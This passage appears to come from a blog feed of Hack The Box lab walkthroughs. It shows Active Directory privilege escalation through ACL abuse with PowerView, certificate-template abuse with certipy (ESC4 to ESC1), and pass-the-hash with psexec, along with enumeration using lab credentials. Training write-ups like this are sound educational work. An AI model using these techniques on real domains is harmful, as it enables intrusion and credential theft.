[OPTIONS] ACTION="Install" QUIET="True" FEATURES=SQL INSTANCENAME="SQLEXPRESS" INSTANCEID="SQLEXPRESS" RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS" AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE" AGTSVCSTARTUPTYPE="Manual" COMMFABRICPORT="0" COMMFABRICNETWORKLEVEL=""0" COMMFABRICENCRYPTION="0" MATRIXCMBRICKCOMMPORT="0" SQLSVCSTARTUPTYPE="Automatic" FILESTREAMLEVEL="0" ENABLERANU="False" SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS" SQLSVCACCOUNT="SEQUEL\sql_svc" SQLSVCPASSWORD="WqSZAF6CysDQbGb3" SQLSYSADMINACCOUNTS="SEQUEL\Administrator" SECURITYMODE="SQL" SAPWD="MSSQLP@ssw0rd!" ADDCURRENTUSERASSQLADMIN="False" TCPENABLED="1" NPENABLED="1" BROWSERSVCSTARTUPTYPE="Automatic" IAcceptSQLServerLicenseTerms=True</code></pre></div> <p>The password was valid for the <code class="language-text">ryan</code> user:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EscapeTwo] └─$ netexec smb 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysDQbGb3' SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False) SMB 10.10.11.51 445 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3</code></pre></div> <p><code class="language-text">evil-winrm</code> shell as <code class="language-text">ryan</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EscapeTwo] └─$ evil-winrm -i 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysDQbGb3' Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\ryan\Documents> whoami sequel\ryan *Evil-WinRM* PS C:\Users\ryan\Documents> cd ../desktop *Evil-WinRM* PS C:\Users\ryan\desktop> ls Directory: C:\Users\ryan\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 3/14/2025 11:27 AM 34 user.txt</code></pre></div> <p>Next, I collected BloodHound data using <code class="language-text">netexec</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EscapeTwo] └─$ netexec ldap 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysDQbGb3' --bloodhound --collection All --dns-server 10.10.11.51 SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False) LDAP 10.10.11.51 389 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 LDAP 10.10.11.51 389 DC01 Resolved collection methods: psremote, rdp, localadmin, acl, session, trusts, dcom, objectprops, group, container LDAP 10.10.11.51 389 DC01 Done in 00M 10S LDAP 10.10.11.51 389 DC01 Compressing output into /home/kali/.nxc/logs/DC01_10.10.11.51_2025-03-14_213136_bloodhound.zip</code></pre></div> <p>After uploading the data into BloodHound, viewing First Degree Object Control for <code class="language-text">ryan</code> showed that the user had WriteOwner over <code class="language-text">ca_svc</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1edf22792beb17cd7e2274ed84bd82f0/9aac5/ryan-object-control.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 42.405063291139236%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABCklEQVR42p2SzWvCQBDFPXjqrfZQWuhFCraJcTebbBLjJtnE+FENNqG0BxF666GH3vz7XzcfQqkGwcNjYBh++97MdkZOiEtkuMHJfueoWQ4qETc6ocNMBGpLEEeeATaDjEs8szE004duTSoZPKjlKJkCD5MnPNomCJctQC+CMRLoyXv0/D6StEC8ypG85Mjetlhu3hHOM4hZBl3z0N1f4Xp6B0pkneo/kCigPvRx83OLr+8Y2/wTi+IDcrGBG81BxxLUq6M7wQxsp+prCuYmlesjYBnHElOIdIndugBRMQfUg6bq0BZN3OZxBWUsgclj5e7cUXiIgSWqfR6O0Xblv87agaWDC79SCfwFIFcHVUxkpp4AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ryan First Degree Object Control" title="" src="/static/1edf22792beb17cd7e2274ed84bd82f0/50637/ryan-object-control.png" srcset="/static/1edf22792beb17cd7e2274ed84bd82f0/dda05/ryan-object-control.png 158w, /static/1edf22792beb17cd7e2274ed84bd82f0/679a3/ryan-object-control.png 315w, /static/1edf22792beb17cd7e2274ed84bd82f0/50637/ryan-object-control.png 630w, /static/1edf22792beb17cd7e2274ed84bd82f0/fddb0/ryan-object-control.png 945w, /static/1edf22792beb17cd7e2274ed84bd82f0/9aac5/ryan-object-control.png 1022w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">ca_svc</code> was a member of the <code class="language-text">Cert Publishers</code> group:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/a73ae640c7d251278d8a6a4c7210e3f7/9bf66/ca_svc-group-membership.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 50.632911392405056%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABPUlEQVR42q2S3U6DQBCF+wJeauKF8c6oLbCh/BR2YWlpAQnBYlNRkyZ6WV/BG32IPu9xdmtMTUhToxcnGQLzMXPO9Ewvxn+q95uPLV+SYgycBH1nfCDQ32rbLGG4EfpDThBB4lQnEClDNO1TrXqiPUAFsglETZd2QA0CI5kjyW8hsxrjokY8W2B+H2DxNIQjSlIKYwfa24UZVoQTeY5TcYZ2+YJ5u0JeLzGrFnDFFEOewpcZQQp6LnVth5PuCa1AYnAV4mh9jGzzhvXrB9rVM8q7R5RNCz/OwMgC01PiZEWobVCWdALVCz/OwcsC9fodXtrAHkmaIkeQFORZRVIrVrTyNZqHCwJOwUZ7QlEJMjfBgHkwXRVC9BWG0MEw+gFPK/KzwKS40bUdjn9M2X02erWOs/neRmr9+Q4POexPTbNNzXLF5NQAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ca_svc First Degree Group Memberships" title="" src="/static/a73ae640c7d251278d8a6a4c7210e3f7/50637/ca_svc-group-membership.png" srcset="/static/a73ae640c7d251278d8a6a4c7210e3f7/dda05/ca_svc-group-membership.png 158w, /static/a73ae640c7d251278d8a6a4c7210e3f7/679a3/ca_svc-group-membership.png 315w, /static/a73ae640c7d251278d8a6a4c7210e3f7/50637/ca_svc-group-membership.png 630w, /static/a73ae640c7d251278d8a6a4c7210e3f7/9bf66/ca_svc-group-membership.png 875w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Members of <code class="language-text">Cert Publishers</code> generally have write permissions on certificate-related objects in Active Directory. Therefore, if any vulnerable certificate templates exist in AD CS, the permissions granted to <code class="language-text">Cert Publishers</code> could potentially be leveraged to modify the template and escalate privileges.</p> <p>So first, I used the WriteOwner permission over <code class="language-text">ca_svc</code> to take control of the account. To do this, I uploaded <code class="language-text">PowerView.ps1</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> upload PowerView.ps1 Info: Uploading /home/kali/Desktop/HTB/EscapeTwo/PowerView.ps1 to C:\programdata\PowerView.ps1 Data: 1206372 bytes of 1206372 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\programdata> ls Directory: C:\programdata Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 6/8/2024 3:37 PM Microsoft d----- 1/4/2025 7:08 AM Package Cache d----- 1/4/2025 8:24 AM regid.1991-06.com.microsoft d----- 9/15/2018 12:19 AM SoftwareDistribution d----- 11/5/2022 12:03 PM ssh d----- 9/15/2018 12:19 AM USOPrivate d----- 11/5/2022 12:03 PM USOShared d----- 6/8/2024 9:34 AM VMware -a---- 3/14/2025 12:06 PM 59392 nc.exe -a---- 3/14/2025 1:03 PM 904779 PowerView.ps1</code></pre></div> <p>Next, I created a PSCredential object for <code class="language-text">ryan</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> $ryan_password = ConvertTo-SecureString 'WqSZAF6CysDQbGb3' -AsPlainText -Force *Evil-WinRM* PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential('sequel.htb\ryan', $ryan_password)</code></pre></div> <p>I dot-sourced PowerView and then used <code class="language-text">Set-DomainObjectOwner</code> to set <code class="language-text">ryan</code> as the owner of the <code class="language-text">ca_svc</code> user object:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1 *Evil-WinRM* PS C:\programdata> Set-DomainObjectOwner -Credential $cred -Identity ca_svc -OwnerIdentity ryan</code></pre></div> <p>Using <code class="language-text">Add-DomainObjectAcl</code>, I granted <code class="language-text">ryan</code> full control over the <code class="language-text">ca_svc</code> user:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> Add-DomainObjectAcl -Credential $cred -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights All</code></pre></div> <p>To change the password of <code class="language-text">ca_svc</code>, I used <code class="language-text">Set-DomainUserPassword</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> $ca_svc_password = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force *Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Credential $cred -Identity ca_svc -AccountPassword $ca_svc_password</code></pre></div> <p>Then, I used the credentials with <code class="language-text">certipy-ad</code> to find any vulnerable certificates:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EscapeTwo] └─$ certipy-ad find -u ca_svc -p P@ssw0rd -dc-ip 10.10.11.51 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA [!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. [*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP [!] Failed to connect to remote registry. Service should be starting now. Trying again... [*] Got CA configuration for 'sequel-DC01-CA' [*] Saved BloodHound data to '20250314220830_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k [*] Saved text output to '20250314220830_Certipy.txt' [*] Saved JSON output to '20250314220830_Certipy.json'</code></pre></div> <p>Viewing <code class="language-text">20250314220830_Certipy.txt</code> revealed that the <code class="language-text">DunderMifflinAuthentication</code> template was vulnerable to ESC4 due to the <code class="language-text">Cert Publishers</code> group having full control. This is shown in the Object Control Permissions section:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">&lt;...snip...> 33 Template Name : DunderMifflinAuthentication Display Name : Dunder Mifflin Authentication Certificate Authorities : sequel-DC01-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : False Certificate Name Flag : SubjectRequireCommonName SubjectAltRequireDns Enrollment Flag : AutoEnrollment PublishToDs Private Key Flag : 16842752 Extended Key Usage : Client Authentication Server Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1000 years Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins Object Control Permissions Owner : SEQUEL.HTB\Enterprise Admins Full Control Principals : SEQUEL.HTB\Cert Publishers Write Owner Principals : SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins SEQUEL.HTB\Administrator SEQUEL.HTB\Cert Publishers Write Dacl Principals : SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins SEQUEL.HTB\Administrator SEQUEL.HTB\Cert Publishers Write Property Principals : SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins SEQUEL.HTB\Administrator SEQUEL.HTB\Cert Publishers [!] Vulnerabilities ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions</code></pre></div> <p>With full control over the template, <code class="language-text">certipy-ad</code> can be used to update the template properties to enable an escalation path. The following command modifies the template to introduce additional vulnerabilities:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EscapeTwo] └─$ certipy-ad template -username ca_svc -password P@ssw0rd -template DunderMifflinAuthentication -dc-ip 10.10.11.51 -save-old Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json' [*] Updating certificate template 'DunderMifflinAuthentication' [*] Successfully updated 'DunderMifflinAuthentication'</code></pre></div> <p>Running the <code class="language-text">find</code> command again and viewing the new configuration confirmed that the template had been updated and was now vulnerable to ESC1, ESC2, ESC3, and ESC4:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text"> 33 Template Name : DunderMifflinAuthentication Display Name : Dunder Mifflin Authentication Certificate Authorities : sequel-DC01-CA Enabled : True Client Authentication : True Enrollment Agent : True Any Purpose : True Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : None Private Key Flag : ExportableKey Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 5 years Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Object Control Permissions Owner : SEQUEL.HTB\Enterprise Admins Full Control Principals : SEQUEL.HTB\Authenticated Users Write Owner Principals : SEQUEL.HTB\Authenticated Users Write Dacl Principals : SEQUEL.HTB\Authenticated Users Write Property Principals : SEQUEL.HTB\Authenticated Users [!] Vulnerabilities ESC1 : 'SEQUEL.HTB\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication ESC2 : 'SEQUEL.HTB\\Authenticated Users' can enroll and template can be used for any purpose ESC3 : 'SEQUEL.HTB\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set ESC4 : 'SEQUEL.HTB\\Authenticated Users' has dangerous permissions</code></pre></div> <p>Since it was vulnerable to ESC1, I could request a certificate on behalf of the <code class="language-text">administrator</code> by supplying a UPN:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EscapeTwo] └─$ certipy-ad req -username ca_svc -password P@ssw0rd -target sequel.htb -ca sequel-DC01-CA -template DunderMifflinAuthentication -upn administrator@sequel.htb Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 7 [*] Got certificate with UPN 'administrator@sequel.htb' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx'</code></pre></div> <p>Initially running <code class="language-text">auth</code> to retrieve the hash resulted in a clock skew error:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EscapeTwo] └─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.51 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@sequel.htb [*] Trying to get TGT... [-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)</code></pre></div> <p>I used <code class="language-text">ntpdate</code> to sync my local VM clock with <code class="language-text">DC01</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EscapeTwo] └─$ sudo ntpdate -u DC01.sequel.htb 2025-03-14 16:16:24.443909 (-0400) -21532.162791 +/- 0.018628 DC01.sequel.htb 10.10.11.51 s1 no-leap CLOCK: time stepped by -21532.162791</code></pre></div> <p>Then, I was able to retrieve the hash:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EscapeTwo] └─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.51 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@sequel.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff</code></pre></div> <p>Using <code class="language-text">impacket-psexec</code> along with the <code class="language-text">administrator</code> user's hash, I obtained a system shell:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EscapeTwo] └─$ impacket-psexec administrator@10.10.11.51 -hashes :7a8d4e04986afa8ed4060f75e5a0b3ff Impacket v0.11.0 - Copyright 2023 Fortra [*] Requesting shares on 10.10.11.51..... [-] share 'Accounting Department' is not writable. [*] Found writable share ADMIN$ [*] Uploading file LYwGcKPN.exe [*] Opening SVCManager on 10.10.11.51..... [*] Creating service cTaQ on 10.10.11.51..... [*] Starting service cTaQ..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.6640] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system C:\Windows\system32> cd \users\administrator\desktop C:\Users\Administrator\Desktop> dir Volume in drive C has no label. Volume Serial Number is 3705-289D Directory of C:\Users\Administrator\Desktop 01/04/2025 08:58 AM &lt;DIR> . 01/04/2025 08:58 AM &lt;DIR> .. 03/14/2025 11:27 AM 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 3,805,245,440 bytes free</code></pre></div>https://mgarrity.com/hack-the-box-administrator/https://mgarrity.com/hack-the-box-administrator/Sat, 04 Jan 2025 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3d43b7aff80b8395e53b8221e0fe4731/3b67f/administrator.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABBElEQVR42mMQkdX+jwuLymn/F5LW/s8trvNfUAbCx6cehBnwGcYjof1fRknzv4mhFpjmkSRsKAMuw/iAmq1NtP83xDn+n5IVBKTt/psbQcTxGYphoCgQCwK9Kaei9b8i3PJ/UUQL0MCU/+WhNf+romz+Sylq/heWIcVAqFdNjLT+V8c6/6/OXfT/9YEN/0uTpv6viHX5b2SgideVWL0sLKvzX0JW7X9/odf/xSsW/9+8a///lt7O/105rv/FZNTB8iSFoRjQdl6gK0Fh1pBs8395d+r/mnir/6aGQHFJiDxZscwrqfVfUl7zv7622n9xOU0wn6xYRnapCNB7AtK6SHz8BgIAp/8LAE0suOYAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Administrator" title="" src="/static/3d43b7aff80b8395e53b8221e0fe4731/50637/administrator.png" srcset="/static/3d43b7aff80b8395e53b8221e0fe4731/dda05/administrator.png 158w, /static/3d43b7aff80b8395e53b8221e0fe4731/679a3/administrator.png 315w, /static/3d43b7aff80b8395e53b8221e0fe4731/50637/administrator.png 630w, /static/3d43b7aff80b8395e53b8221e0fe4731/fddb0/administrator.png 945w, /static/3d43b7aff80b8395e53b8221e0fe4731/3b67f/administrator.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Administrator is a Windows machine running Active Directory. The box starts with a given set of credentials, which can be used to gather domain data for BloodHound. This reveals that <code class="language-text">olivia</code>, the initial user, has GenericAll privileges over <code class="language-text">michael</code>, allowing <code class="language-text">olivia</code> to reset the password of the account. <code class="language-text">michael</code> can then use ForceChangePassword rights to change the password for another user, <code class="language-text">benjamin</code>, a member of the <code class="language-text">Share Moderators</code> group. Members of this group have access to an FTP server containing a Password Safe database. Cracking the safe combination reveals the passwords for three domain users. Among them, <code class="language-text">emily</code> has GenericWrite access over <code class="language-text">ethan</code>. This can be leveraged to run a targeted kerberoast on <code class="language-text">ethan</code>, resulting in obtaining the user's password. <code class="language-text">ethan</code> has DCSync rights (i.e., DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) on the domain, which leads to a shell as <code class="language-text">administrator</code>.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ nmap -sC -sV -oA nmap/output 10.10.11.42 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 08:44 EST Nmap scan report for 10.10.11.42 Host is up (0.049s latency). Not shown: 988 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-02 20:45:43Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-01-02T20:45:50 |_ start_date: N/A |_clock-skew: 7h01m23s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.57 seconds</code></pre></div> <p>I added <code class="language-text">administrator.htb</code> and <code class="language-text">dc.administrator.htb</code> to <code class="language-text">/etc/hosts</code>. Then, using the given set of credentials, I attempted to log in to the FTP server as <code class="language-text">Olivia</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ ftp 10.10.11.42 Connected to 10.10.11.42. 220 Microsoft FTP Service Name (10.10.11.42:kali): Olivia 331 Password required Password: 530 User cannot log in, home directory inaccessible. ftp: Login failed</code></pre></div> <p>The creds weren't valid on the FTP server, but they worked over SMB:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ netexec smb 10.10.11.42 -u 'olivia' -p 'ichliebedich' SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False) SMB 10.10.11.42 445 DC [+] administrator.htb\olivia:ichliebedich</code></pre></div> <p>The available shares were all default:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ netexec smb 10.10.11.42 -u 'olivia' -p 'ichliebedich' --shares SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False) SMB 10.10.11.42 445 DC [+] administrator.htb\olivia:ichliebedich SMB 10.10.11.42 445 DC [*] Enumerated shares SMB 10.10.11.42 445 DC Share Permissions Remark SMB 10.10.11.42 445 DC ----- ----------- ------ SMB 10.10.11.42 445 DC ADMIN$ Remote Admin SMB 10.10.11.42 445 DC C$ Default share SMB 10.10.11.42 445 DC IPC$ READ Remote IPC SMB 10.10.11.42 445 DC NETLOGON READ Logon server share SMB 10.10.11.42 445 DC SYSVOL READ Logon server share</code></pre></div> <p>I downloaded the shares, but they didn't contain anything interesting. So next, I used the <code class="language-text">olivia</code> user's credentials with <code class="language-text">bloodhound-python</code> to collect domain data:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ bloodhound-python -u 'olivia' -p 'ichliebedich' -d administrator.htb -c all -ns 10.10.11.42 --dns-tcp INFO: Found AD domain: administrator.htb INFO: Getting TGT for user INFO: Connecting to LDAP server: dc.administrator.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc.administrator.htb INFO: Found 11 users INFO: Found 53 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc.administrator.htb INFO: Done in 00M 09S</code></pre></div> <p>After uploading the data into BloodHound, I viewed First Degree Group Memberships for <code class="language-text">olivia</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/021c459ba6df490a9d69f9127bb4ffbc/1ee40/olivia-group-membership.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 74.0506329113924%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAABhElEQVR42p2TWVLCQBCGOYDv3gBcAknIMmRfSEgIEIQARSGFWr55BE/hjX9nhlULIvHhr9m6vvq7p7vW0l1cUlNzuI537Gwf7k+1j6mVAaWOD9nw+drSPb7m8zpU24RIgsObTCUSrxzIArrZBOFOg+kS2WSJKMvRGxVI8jmiwRRh/4lLMUPutBTIAtjqxkMYQX9XBg9lWdUuwR4VC20zwOz5DVZ3AEG1S0EXgRLxKcymjlKM52vobg8Pbesq2A+gSLawuqjAjVIUq1dedOZUIl41IKuVQFvirqHhZn0LslmgKTloSGT3w+71QAZTrC6C/gRBmiN4n+Hl8wub9w8k4zlP99r6HRwyF5odQXNj6EYMUTXR8VOMihXtuzU6XsJTr1RDQXW4E0GzeROzj7mXDZhhhnS8AKGf0+Sx/2ib3+3DpDsxNCqRMKfW2bH7E7iHykbAu0AkMdK8BT9p031E+9Tnb5WB8WjGxywespErKHRGx3LKR9Pr5dWA2/raJ3KO+zMpfwOWtvPqsQBB2gAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="olivia First Degree Group Memberships" title="" src="/static/021c459ba6df490a9d69f9127bb4ffbc/50637/olivia-group-membership.png" srcset="/static/021c459ba6df490a9d69f9127bb4ffbc/dda05/olivia-group-membership.png 158w, /static/021c459ba6df490a9d69f9127bb4ffbc/679a3/olivia-group-membership.png 315w, /static/021c459ba6df490a9d69f9127bb4ffbc/50637/olivia-group-membership.png 630w, /static/021c459ba6df490a9d69f9127bb4ffbc/1ee40/olivia-group-membership.png 644w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Viewing First Degree Object Control for <code class="language-text">olivia</code> showed GenericAll privileges over the <code class="language-text">michael</code> user:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 588px; " > <a class="gatsby-resp-image-link" href="/static/0bd15d064b30ab99f449d93f0dbaa661/7a752/olivia-object-control.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: 